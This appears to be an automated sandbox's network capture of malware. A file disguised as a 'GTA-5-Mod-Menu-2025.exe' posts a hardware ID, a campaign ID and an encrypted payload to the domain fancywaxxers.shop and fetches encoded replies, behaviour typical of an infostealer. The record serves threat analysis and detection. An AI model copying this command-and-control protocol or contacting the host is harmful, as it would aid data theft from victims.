2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 0d 0a 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 35 5a 30 5a 39 54 44 36 43 37 54 4d 48 4d 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 0d 0a Data Ascii: --95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="hwid"ACBBB19E4921B4981E3DEB35470B39C1--95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="pid"1--95Z0Z9TD6C7TMHMMContent-Disposition: form-data; name="lid"yau6Na--899083440
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 8d b1 a9 08 92 75 e7 eb 15 1b 04 69 0e d1 1d ad 48 b5 15 ee 8b d5 e0 72 cc 35 d4 3b 97 1f dd f1 9d fe 53 d2 e5 b5 82 46 a4 0f ec e9 81 a8 df 36 4e c7 2a 0f 66 27 24 a8 ec ad 67 2d ea 85 9d 8e 7c 38 7b a8 4d 13 42 cf fb bc 53 81 ca 9b bc 62 21 17 94 e8 22 b5 04 41 65 b3 b9 4a 05 80 af b8 d9 64 bd f8 e8 f0 a4 3a 0f 33 cb 5c fa a5 8a 3f 94 5e b6 37 3c eb b9 68 2a 91 29 88 a0 6e b8 08 ff 7a 19 e6 08 96 ab 6f 9e 1b fe d9 c1 ca 78 45 9f 5d e5 05 bb 49 80 ea 19 09 96 f9 16 b3 b0 16 b8 2d eb f9 d4 d5 f4 f8 9b 32 32 f7 7a d3 da 59 6b 08 c1 aa eb f5 83 2f 57 ec 11 54 65 8b ff ef 61 cc 5e 2c 8c 0c c6 90 b5 d9 d3 00 e2 5e 35 9b 0f bb 02 4b 44 9b dc bc 8a 19 9e 8e 63 55 98 ab cb 52 ed 67 86 f2 6e e1 f3 19 da 79 53 dd 16 20 1f 87 e9 45 c2 bd bf 9d fa 66 21 ea eb b1 00 Data Ascii: uiHr5;SF6Nf'$g-\|8{MBSb!"AeJd:3\?^7<h)nzoxE]I-22zYk/WTea^,^5KDcURgnyS Ef!
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 3b 56 48 7c 70 bc 17 0b 6c 80 3d c0 f2 f8 7b cb b8 39 4d 0b e9 19 df 19 ff a9 66 16 14 f1 d4 b1 f9 01 e0 9e fb c9 ea fa c9 6b a0 8f 86 ff 3c e6 ad 3c 26 9a 1e a3 b9 e3 fa ab af 5e 17 fd a8 57 d9 d9 09 63 a5 2e 33 44 71 3c 23 fd 78 ed e4 31 49 24 1c c4 37 76 e5 f2 b1 7f 9e 85 be 4d cf 75 6e b2 bf 88 b2 94 0a 01 f7 29 f7 97 1f 4b 67 39 3d d2 c3 f1 89 29 1e e2 ee 16 83 4b 68 86 a1 04 28 d9 6d b2 27 f0 0c 1e 9f 70 61 69 e8 9f 78 d1 53 45 91 fb 0b 92 3c 60 b8 52 f7 45 f9 8a e0 8f 81 fe dc 7a fd a1 1f d6 82 f4 e2 48 69 61 e1 d9 4a d7 50 13 5e d1 f7 68 c2 d3 26 b8 a1 78 ac 19 a7 34 6e 0f 02 3f 68 f0 25 bc 23 44 84 bd 30 54 52 60 98 75 46 79 51 75 5b 2a 58 39 c7 ff 7c da 45 5c 1b ea b1 3e 31 7b ef de 9e 96 df 3c d2 6b 98 87 6f af 5d 77 77 b9 61 f1 75 94 f4 bd da Data Ascii: ;VH\|pl={9Mfk<<&^Wc.3Dq<#x1I$7vMun)Kg9=)Kh(m'paixSE<`REzHiaJP^h&x4n?h%#D0TR`uFyQu[*X9\|E\>1{<ko]wwau
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: ff 62 42 f6 bf ad 2b 49 55 63 5c c5 fe 52 36 77 b2 ac 3f c8 45 b3 33 f1 f3 84 30 d7 ad ca fe e2 e2 91 2d d7 14 f1 14 f1 57 6a b3 4f 8a 99 e5 ca ff 6e 44 fa 71 e5 39 39 34 86 f5 af 0e d9 6f 06 1d e3 2d d4 5b 1e 28 d4 cc 61 ac 7d fd 6e 15 7b 88 ce 43 cd 45 9f 72 70 5c 75 0a 3f b4 31 e0 7e 5f f1 9e e6 a2 93 7c 72 d4 27 8d 97 2d 3f b1 37 6f 6d 3a 29 f5 7c ea 7d 63 a4 4e 0f ee cb 00 e4 3a 78 ad 14 35 b9 f5 72 e3 dd 98 16 9a 65 30 db c9 19 b8 a5 b3 2e 20 11 97 f7 23 83 5b 17 fd 49 d1 f8 11 5c df ee ef 20 0a 6a 7e 06 f7 9d fe ab 8e c3 9f 61 49 ef cd 16 29 94 b8 c4 0e 5f 6b d7 b4 d7 00 46 b0 c9 61 e1 b8 27 e1 07 ca 16 6f d1 6f f0 01 68 4e e2 80 35 31 95 b3 47 99 74 72 6e 51 75 d3 a0 9a c1 bc 30 22 13 f3 22 29 34 6a 54 88 22 74 a2 b6 65 c5 40 fe c1 a3 98 c6 e0 9a Data Ascii: bB+IUc\R6w?E30-WjOnDq994o-[(a}n{CErp\u?1~_\|r'-?7om:)\|}cN:x5re0. #[I\ j~aI)_kFa'oohN51GtrnQu0"")4jT"te@
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 2f bc f5 4a 3a 3d 90 d1 52 d0 7f 7f c2 e5 8e 5f 06 67 05 0b 4f 9e a7 5b 09 dd 92 ca a9 d1 8f d1 8a 49 ac a2 5f 38 39 0d 7e f8 43 6f 4d b1 4a 21 b1 88 bf e0 e0 f2 7f 8d 7e 08 28 bc cb 5f 98 87 b9 80 01 5b 68 60 e0 03 cd 9b 23 64 99 53 8c 10 e9 56 d5 67 90 54 8f d7 4b df aa 43 c8 3c 68 38 82 a2 1f 9d fb 41 3f 9b c2 68 08 ef 13 c5 8f bc f5 35 d6 e7 78 ab 75 55 70 f0 2b ba 06 b6 2f 3e 77 cc 49 5e 15 17 44 c8 3c 7e 68 e2 1c ec 81 6f 94 18 4a ce 15 42 b8 ac 89 d3 58 16 b0 cd 90 5e 3a 33 94 5d 0c 78 81 34 e3 95 18 8f 08 78 8f 3f fa a2 7a 7b 25 dd 81 6a 22 63 72 92 bf 1c 3c cb 2e b8 8c 86 f9 04 d4 c1 cb 5c 9b 09 e8 14 1f 76 ed c9 8f aa d4 51 64 0e 36 2f 16 ff 74 43 d4 9e 71 2c 35 45 1c ef af 9d 59 c1 d9 87 8d 2c 91 77 80 32 7d 40 89 97 e8 9b 36 a1 fb a4 1a 63 60 Data Ascii: /J:=R_gO[I_89~CoMJ!~(_[h`#dSVgTKC<h8A?h5xuUp+/>wI^D<~hoJBX^:3]x4x?z{%j"cr<.\vQd6/tCq,5EY,w2}@6c`
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 3a 4b c0 49 3c 69 50 e9 55 73 53 15 85 09 5e 35 68 ed 1f b0 3d 47 2f b5 19 cf dc 98 94 bc 20 ae ef bb e2 ea 75 90 ea 35 ab 24 17 11 28 74 98 d4 ec 18 46 1e c9 2e b4 19 99 57 dc 2f 5a 5d 65 f9 b5 d3 d8 ff a2 f6 a4 d1 a2 bb 57 4f 83 d1 2b 4c 34 68 2e e2 4c fe 3a 58 e7 7a 53 92 25 22 5c 79 26 c9 5d 2d 86 74 63 54 90 52 03 9f 61 3d 88 b8 29 b6 81 65 b7 fe a2 27 63 c7 23 d2 0b c0 98 c1 a6 be 5c b3 1e ef 7b b9 65 5c e0 69 52 4f 54 88 e5 b9 5b 8e bb 6e 14 b0 6c dd 32 cc ab 8c 77 29 9d a3 49 2e c4 50 53 99 cb 27 e3 ac ac 94 32 94 fb 62 33 c4 c4 e2 65 be ac fe ac cf 61 f2 f2 ff 20 9d a7 dd 9c c5 dc 97 9d d4 db dc 77 8e b5 95 21 f4 49 4e 6b 09 3c 89 6b 33 80 cf b2 dd 54 19 a5 92 cf 14 92 d4 05 f8 6a c2 7e b1 1a fe 11 a9 32 71 c2 55 e5 77 13 bc 05 0e 79 73 3a 4d 9d Data Ascii: :KI<iPUsS^5h=G/ u5$(tF.W/Z]eWO+L4h.L:XzS%"\y&]-tcTRa=)e'c#\{e\iROT[nl2w)I.PS'2b3ea w!INk<k3Tj~2qUwys:M
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 54 3f e7 e7 42 ea 6c 91 76 de b8 f1 62 bd 44 ce 18 bc fa 1f 5e 32 35 a7 18 2d 22 f0 c3 dc 1f a5 a9 dd 26 03 7f f5 10 f0 fb 94 1a 08 c4 96 7e 79 e6 dd 99 77 5d 4d bd cc 3e 75 66 30 f3 1a f5 8e 50 05 f0 f7 43 77 9f a6 9a 7f 25 82 df e5 be 4b 8f 1e 53 67 df ca 69 ef df 45 04 cd 86 60 ed 9e 0c 3c 89 b3 c7 93 e6 7c 36 b4 e4 60 8b c5 4d f3 74 5b 0f ae ce de ec 6b d4 c8 0a 52 63 eb 99 88 8f 93 97 37 b4 ce d1 a3 61 59 2c 8e 6d b1 a1 45 a2 9e 60 b5 5c e7 b4 b4 67 5e 25 a7 6c 48 5d 87 0e 26 44 b9 fb 3e dd 36 e7 91 4c 8c aa da e6 60 e0 e6 33 5c ad 91 ec d7 e4 91 5c 79 46 12 f6 74 d2 1e 29 93 dd 75 fa 09 12 da a1 f9 41 80 09 1b 79 14 cf 08 40 5d 91 c1 67 50 05 08 97 9c e8 33 d3 e4 f0 37 ba 76 4e f0 bc 2e c2 cf 05 ec a0 97 92 b0 5f ae 84 09 52 0e 0d 29 28 a7 95 72 fd Data Ascii: T?BlvbD^25-"&~yw]M>uf0PCw%KSgiE`<\|6`Mt[kRc7aY,mE`\g^%lH]&D>6L`3\\yFt)uAy@]gP37vN._R)(r
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: dc 51 66 5e 09 fa 75 80 f6 c3 8e b5 39 ff 4e be 43 0e 37 71 d5 a1 3d 04 17 85 c8 cc fe cb c0 a6 d2 e9 9c 5e 3e f3 dd 86 7b 10 7e 9f cb 38 8c 9e 85 46 f5 bf 94 eb 03 c1 78 1c 90 07 1e 60 5f d3 e6 0b b5 27 49 56 85 a6 bc 36 25 fb 36 00 e4 e0 fe f7 01 e7 41 0e ef 9c b1 93 20 d9 f7 61 2a 5a 7b 2c b0 cf ef 86 c7 70 09 54 a1 97 5f af 06 91 4b e7 7e ad f7 e5 c5 26 25 db e2 02 d0 fd 6d 2e eb 63 b8 ac b8 8d 36 d1 f5 4c de fc 42 dd 45 dd bb 12 4c 19 e0 b0 62 f8 4f 00 27 8a e1 6d d6 8c 64 9c 39 31 f6 84 67 b8 64 d1 72 40 07 ae ca b2 59 5e f4 d5 c7 3c e7 3c 60 77 47 f6 16 df 4e 88 a0 34 0c b1 fe 9d c3 ad 36 5c 72 9d 85 40 03 0b 66 86 23 9d 32 6f df 8d 76 13 9f 2f da 5d de d6 96 52 be 97 bb be 31 c7 eb 56 ab e2 84 50 6c bf 17 e9 33 64 1c a3 58 f7 b2 35 20 10 b5 cc ea Data Ascii: Qf^u9NC7q=^>{~8Fx`_'IV6%6A a*Z{,pT_K~&%m.c6LBELbO'md91gdr@Y^<<`wGN46\r@f#2ov/]R1VPl3dX5
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: 9b 46 ea c3 13 74 f1 70 1d e6 de e3 f9 c1 ed 51 5c bd c8 44 64 42 80 f2 a2 fc e6 70 3d 37 51 87 41 ac 60 33 25 51 cc 96 d5 ea de 4a de b8 c8 bb 05 b7 f8 38 73 38 71 76 00 3b 0b a9 22 64 54 8f dc 0c dd 47 56 21 b9 b5 db 7a 8a 15 3e fe fb 6f 7a 1d 3a ff ab cb 11 aa 34 76 ff ec ab 79 2d 34 78 3f 6d ce 07 c8 d9 06 dc d3 14 14 62 ed d9 6f 70 65 5b 86 0f 3d 10 7d de d6 73 8e ad 23 e5 ad 07 12 ee d3 d2 fc b8 a2 01 60 73 0f 83 b9 56 1f 49 64 10 19 26 9a eb 0c 09 5f 92 82 e8 a5 c0 2e 43 54 48 85 31 82 18 0f 0b 21 4a b2 7c 57 6e b9 1e a1 85 cd 16 85 d4 68 b6 ae a9 61 df 95 80 ee 55 af ac 68 07 24 78 1a 90 f6 c6 ad c6 a6 d3 5f d9 43 e0 d3 1e 53 d7 6d 92 a4 ec 3a 13 74 ec cf 95 3c cd 3a 65 81 1b bd a9 ed 36 ce d1 ab cd eb b0 a7 48 e3 34 43 1e 9c f4 5c dd 3e 3e f2 3e Data Ascii: FtpQ\DdBp=7QA`3%QJ8s8qv;"dTGV!z>oz:4vy-4x?mbope[=}s#`sVId&_.CTH1!J\|WnhaUh$x_CSm:t<:e6H4C\>>>
2024-12-30 19:41:08 UTC	15331	OUT	Data Raw: e7 7d 26 77 a0 48 75 3d 6e ba 3d 80 cb 36 ef 17 a6 0a 5f f7 6a 8e e1 dd 20 70 4f db 48 4f 23 c1 37 e7 d3 ac 34 be f2 a2 36 7e af 92 f1 e7 8e 6a b4 0c 94 f4 d9 c9 03 36 bf 23 27 1f 89 89 0c de fc 6b 9e 3f bc e7 61 7d 42 c4 ba 90 15 d2 ad be d5 71 36 1b 66 4b b2 84 51 40 fe d7 68 fe 0d 6b 67 96 c1 d1 2b 2c 11 f0 74 87 f3 af e4 8b 47 72 9c 85 19 99 b6 74 33 e3 4d 3c 5b 1c 65 55 e5 ca af eb 94 6a 21 bd bc a5 6d 64 4f 51 ed 09 c5 87 82 8d 27 48 0f b5 49 e5 1a 55 08 f2 56 7c ed fe e8 a9 ae cd 08 5d 5d f0 49 f4 d8 e3 ff 3e 26 4b c6 12 79 ca 8a 89 9a e2 0d 8a f4 86 b2 95 a2 e5 ef 58 99 39 cf 8a ea 0b 3f bc c3 eb 67 32 17 d8 1b 5c fb 98 4f 06 a3 61 73 2d e5 e1 44 af bf 99 1b a3 25 ec e0 c0 51 df 39 ca 80 c5 9f b5 4d ae 53 be c5 2e 93 0e 0a 2b 1b 8b 4f 10 63 ae 11 Data Ascii: }&wHu=n=6_j pOHO#746~j6#'k?a}Bq6fKQ@hkg+,tGrt3M<[eUj!mdOQ'HIUV\|]]I>&KyX9?g2\Oas-D%Q9MS.+Oc
2024-12-30 19:41:10 UTC	1145	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uirrdiejf8bcp65cqh9sj8giua; expires=Fri, 25 Apr 2025 13:27:48 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7i%2BgmY4YzRv%2BdG1po3POHjZocJHdY2evmUvwRjt%2FLwRvVEGfQrv%2Fpo%2B5nebrfz4cf5xxGPUXv3%2BdnCtRg%2FmPTFuUMktoIu9Klsf4ultC5wKIjd0fNHhwuL0G0B0XOoeRvu1o4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4816fdf39c32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1667&rtt_var=632&sent=199&recv=592&lost=0&retrans=0&sent_bytes=2844&recv_bytes=574833&delivery_rate=1720683&cwnd=178&unsent_bytes=0&cid=bb82b7264940a007&ts=1760&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49728	104.21.96.1	443	6216	C:\Users\user\Desktop\GTA-5-Mod-Menu-2025.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 19:41:10 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 86 Host: fancywaxxers.shop
2024-12-30 19:41:10 UTC	86	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 38 39 39 30 38 33 34 34 30 26 6a 3d 26 68 77 69 64 3d 41 43 42 42 42 31 39 45 34 39 32 31 42 34 39 38 31 45 33 44 45 42 33 35 34 37 30 42 33 39 43 31 Data Ascii: act=get_message&ver=4.0&lid=yau6Na--899083440&j=&hwid=ACBBB19E4921B4981E3DEB35470B39C1
2024-12-30 19:41:11 UTC	1131	IN	HTTP/1.1 200 OK Date: Mon, 30 Dec 2024 19:41:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=cs16stiupgq72paf8vumvq67b4; expires=Fri, 25 Apr 2025 13:27:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MBpvWn4zbY0TgazI0oZ3ZJTog5F3wX1mhSUgTuRzcJdPMKPOKDVFTY8Dg6Zx%2BQy%2Fl1rORimyWVSt8cUyOsoSWmrAjxloecHrs3RIbxDDpds7UwNeW57%2BKVOdvqhl0sJX4W%2BNCQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fa4817decf41a48-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1895&rtt_var=730&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2843&recv_bytes=987&delivery_rate=1479979&cwnd=157&unsent_bytes=0&cid=fa827ac530fe2a8c&ts=462&x=0"
2024-12-30 19:41:11 UTC	238	IN	Data Raw: 33 36 35 38 0d 0a 69 78 33 38 74 6c 6d 45 43 74 42 77 36 4d 78 68 51 4c 76 6d 4e 32 49 57 39 58 63 33 36 42 53 35 61 73 4f 6f 44 68 6f 67 6f 6c 62 51 5a 74 37 51 4c 61 59 77 34 56 7a 4b 71 55 4e 36 69 73 6f 56 42 6a 54 50 56 56 2f 5a 63 4f 41 47 6b 4a 35 72 58 6d 62 4e 4d 4e 4a 74 7a 65 63 54 33 47 69 61 45 36 2f 2f 41 68 44 66 31 58 6b 36 52 72 68 50 65 59 46 52 38 67 61 49 30 46 64 53 65 75 34 64 7a 30 36 2f 34 42 57 78 50 70 30 6e 67 4c 67 49 4c 75 32 6e 57 77 5a 6c 6d 51 42 56 6a 47 4f 41 57 61 43 5a 62 53 4a 61 32 6d 54 43 54 49 33 6a 4b 38 4a 74 74 42 75 48 71 44 6b 58 38 62 4e 43 44 48 47 4e 46 6e 2f 61 58 39 30 2f 67 50 34 38 59 33 6a 67 49 72 68 5a 7a 39 49 6a 30 6e 43 71 49 4b 79 56 43 51 50 4c Data Ascii: 3658ix38tlmECtBw6MxhQLvmN2IW9Xc36BS5asOoDhogolbQZt7QLaYw4VzKqUN6isoVBjTPVV/ZcOAGkJ5rXmbNMNJtzecT3GiaE6//AhDf1Xk6RrhPeYFR8gaI0FdSeu4dz06/4BWxPp0ngLgILu2nWwZlmQBVjGOAWaCZbSJa2mTCTI3jK8JttBuHqDkX8bNCDHGNFn/aX90/gP48Y3jgIrhZz9Ij0nCqIKyVCQPL
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 73 6d 49 31 56 4d 63 6b 58 72 31 2b 30 41 65 36 6e 48 39 59 65 73 46 39 75 57 32 4c 31 57 2f 43 62 37 51 33 71 5a 38 58 43 4e 72 55 61 30 31 62 77 43 56 34 76 69 54 4f 47 2f 71 51 50 69 68 44 2f 6e 6d 34 5a 35 6a 4d 4b 2f 4e 4f 70 51 6a 64 67 69 56 34 39 39 34 45 49 48 36 36 4c 55 65 35 56 66 55 6b 6d 64 31 42 56 42 53 61 4c 50 4e 77 70 76 63 6f 30 54 36 57 47 37 4b 6e 45 77 33 6e 79 58 6f 79 58 34 41 5a 55 4a 42 31 38 56 69 49 7a 46 74 58 64 70 41 76 75 6c 75 52 68 51 33 55 62 71 6f 6c 6b 72 59 78 42 4f 4b 55 64 42 4a 46 68 69 42 31 32 6b 66 52 57 71 66 78 59 6b 6b 57 37 52 4c 4e 63 70 72 76 4b 62 56 62 6d 69 69 4b 68 6a 67 48 69 4b 74 6e 42 69 57 37 4c 30 47 6c 4c 50 51 70 68 75 4e 69 55 56 6a 37 48 74 46 57 76 75 42 6f 37 56 79 63 41 4e 79 42 4e 69 69 Data Ascii: smI1VMckXr1+0Ae6nH9YesF9uW2L1W/Cb7Q3qZ8XCNrUa01bwCV4viTOG/qQPihD/nm4Z5jMK/NOpQjdgiV4994EIH66LUe5VfUkmd1BVBSaLPNwpvco0T6WG7KnEw3nyXoyX4AZUJB18ViIzFtXdpAvuluRhQ3UbqolkrYxBOKUdBJFhiB12kfRWqfxYkkW7RLNcprvKbVbmiiKhjgHiKtnBiW7L0GlLPQphuNiUVj7HtFWvuBo7VycANyBNii
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 6c 57 46 4a 45 53 2f 56 6f 73 35 71 35 6c 71 51 30 7a 78 59 4f 35 5a 75 74 6b 2f 33 58 72 68 49 61 4b 55 41 77 72 59 6f 51 51 42 52 70 46 45 65 62 42 45 39 46 4b 4e 77 55 74 52 54 4f 6b 75 30 6c 57 6d 2f 52 48 53 4f 37 6b 6d 70 4c 78 56 44 65 79 4f 44 67 74 34 6f 7a 5a 62 6a 47 66 56 48 61 48 4d 65 53 4d 54 77 57 66 6f 4a 59 62 42 61 38 31 62 6f 53 57 61 69 67 59 6b 30 49 6c 54 4f 6b 47 2f 49 6b 4b 47 63 38 45 4c 69 35 70 46 66 6e 58 68 41 4c 6c 6b 70 50 51 74 74 30 37 6a 46 4a 4b 61 47 7a 72 72 6f 6d 34 4b 56 59 55 6b 52 4c 39 57 69 7a 6d 72 6d 57 70 44 54 50 46 67 37 6c 6d 36 32 54 2f 64 65 75 45 68 6f 70 51 44 43 74 69 68 42 41 46 47 6b 55 52 35 73 45 54 30 55 6f 33 42 53 31 46 4d 36 53 37 53 56 61 62 39 45 64 49 37 75 53 61 6b 76 46 55 4e 37 49 34 4f Data Ascii: lWFJES/Vos5q5lqQ0zxYO5Zutk/3XrhIaKUAwrYoQQBRpFEebBE9FKNwUtRTOku0lWm/RHSO7kmpLxVDeyODgt4ozZbjGfVHaHMeSMTwWfoJYbBa81boSWaigYk0IlTOkG/IkKGc8ELi5pFfnXhALlkpPQtt07jFJKaGzrrom4KVYUkRL9WizmrmWpDTPFg7lm62T/deuEhopQDCtihBAFGkUR5sET0Uo3BS1FM6S7SVab9EdI7uSakvFUN7I4O
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 31 78 6b 6d 37 70 4a 70 76 4c 58 48 39 6d 31 47 62 76 52 38 75 48 45 75 31 6b 73 52 69 77 76 53 6f 47 6a 62 4e 35 45 48 71 73 49 67 61 43 55 38 45 54 6a 73 46 39 55 46 66 47 5a 39 68 65 6f 4a 6b 6a 37 58 6d 57 4e 70 69 35 44 33 54 57 31 6e 77 6b 59 35 59 55 61 38 64 47 69 6c 71 53 36 6b 70 39 56 4f 6b 4b 70 48 79 56 34 79 6a 38 4d 72 77 6f 6e 5a 51 4c 45 76 79 36 47 43 34 69 67 55 52 42 76 6d 62 57 51 66 76 77 52 69 4a 42 36 6d 62 65 66 49 6a 73 50 74 35 63 76 69 65 41 70 52 4e 35 79 64 46 65 4c 30 72 61 48 48 50 66 49 4e 56 62 38 75 5a 32 62 57 33 49 4d 37 4a 50 6d 4d 49 68 73 56 69 53 4d 71 50 35 49 69 33 4b 6e 6b 42 61 5a 36 30 51 42 62 39 62 7a 31 69 73 78 45 31 43 64 35 45 6c 32 33 37 4f 78 42 62 30 58 34 4d 2f 76 50 6f 75 4c 50 43 65 62 69 70 4d 75 Data Ascii: 1xkm7pJpvLXH9m1GbvR8uHEu1ksRiwvSoGjbN5EHqsIgaCU8ETjsF9UFfGZ9heoJkj7XmWNpi5D3TW1nwkY5YUa8dGilqS6kp9VOkKpHyV4yj8MrwonZQLEvy6GC4igURBvmbWQfvwRiJB6mbefIjsPt5cvieApRN5ydFeL0raHHPfINVb8uZ2bW3IM7JPmMIhsViSMqP5Ii3KnkBaZ60QBb9bz1isxE1Cd5El237OxBb0X4M/vPouLPCebipMu
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 73 7a 6c 79 62 36 6a 64 76 54 2b 30 4b 70 47 65 59 30 79 2f 44 54 70 73 66 32 49 59 55 4f 76 4f 6b 42 54 46 2f 75 6a 56 57 30 43 4c 4e 44 34 4b 52 4f 58 74 35 6c 32 66 61 62 59 37 69 46 64 67 6c 67 53 61 43 75 43 4d 77 39 49 30 4f 4c 48 65 42 45 30 43 35 65 5a 4a 42 70 4d 5a 69 56 57 61 51 50 72 39 73 6a 49 51 73 31 47 61 71 53 4b 32 45 45 43 66 6e 79 56 49 37 5a 35 41 30 48 4c 42 48 37 43 50 32 7a 56 49 31 61 4d 77 6a 78 33 62 46 38 78 2f 43 50 75 6b 62 6d 4b 67 34 43 4f 33 57 58 79 6c 43 78 55 39 61 6d 45 44 57 58 34 6a 72 65 6d 4a 57 38 32 4f 36 57 63 2f 53 43 4d 59 68 67 41 53 77 68 53 63 42 30 74 4e 47 45 6a 32 2f 41 32 65 46 49 65 41 47 6b 4a 78 6d 49 32 76 36 4d 65 56 4f 73 39 74 72 36 32 48 69 48 64 75 50 56 78 65 4d 6b 30 55 74 5a 71 41 6b 65 4c Data Ascii: szlyb6jdvT+0KpGeY0y/DTpsf2IYUOvOkBTF/ujVW0CLND4KROXt5l2fabY7iFdglgSaCuCMw9I0OLHeBE0C5eZJBpMZiVWaQPr9sjIQs1GaqSK2EECfnyVI7Z5A0HLBH7CP2zVI1aMwjx3bF8x/CPukbmKg4CO3WXylCxU9amEDWX4jremJW82O6Wc/SCMYhgASwhScB0tNGEj2/A2eFIeAGkJxmI2v6MeVOs9tr62HiHduPVxeMk0UtZqAkeL
2024-12-30 19:41:11 UTC	1369	IN	Data Raw: 6d 63 63 6c 63 47 4c 31 5a 75 31 70 69 4d 4d 54 79 6e 6e 69 4a 4b 48 30 4b 43 6e 70 6a 58 39 56 55 72 45 75 54 34 70 65 7a 42 43 4c 36 6a 78 4a 46 4d 59 48 34 47 75 56 7a 7a 7a 6a 58 72 4d 55 72 76 34 4c 46 49 6d 6c 66 46 74 42 6f 77 42 55 76 79 50 4d 47 49 7a 59 57 30 6c 76 39 6d 44 45 63 62 66 4f 41 4d 78 51 6e 42 6a 5a 6a 7a 49 55 33 70 59 42 49 46 47 64 52 32 2b 4a 57 6f 6b 61 6c 4f 4a 6c 64 48 44 6d 42 62 67 76 73 59 63 36 35 31 71 33 52 6f 79 4b 44 77 50 70 71 31 45 4f 64 4b 30 64 59 6f 5a 65 31 42 69 62 7a 31 35 70 5a 5a 49 50 35 55 69 76 34 47 76 39 55 75 67 41 72 4b 34 31 43 6f 32 77 65 46 42 75 75 53 73 59 73 69 43 53 49 4a 44 59 4a 56 4e 79 38 43 66 6c 54 36 54 56 50 2f 30 79 6f 53 69 50 2b 67 49 47 69 36 64 52 57 6b 4f 4d 45 57 66 44 52 4e 70 Data Ascii: mcclcGL1Zu1piMMTynniJKH0KCnpjX9VUrEuT4pezBCL6jxJFMYH4GuVzzzjXrMUrv4LFImlfFtBowBUvyPMGIzYW0lv9mDEcbfOAMxQnBjZjzIU3pYBIFGdR2+JWokalOJldHDmBbgvsYc651q3RoyKDwPpq1EOdK0dYoZe1Bibz15pZZIP5Uiv4Gv9UugArK41Co2weFBuuSsYsiCSIJDYJVNy8CflT6TVP/0yoSiP+gIGi6dRWkOMEWfDRNp
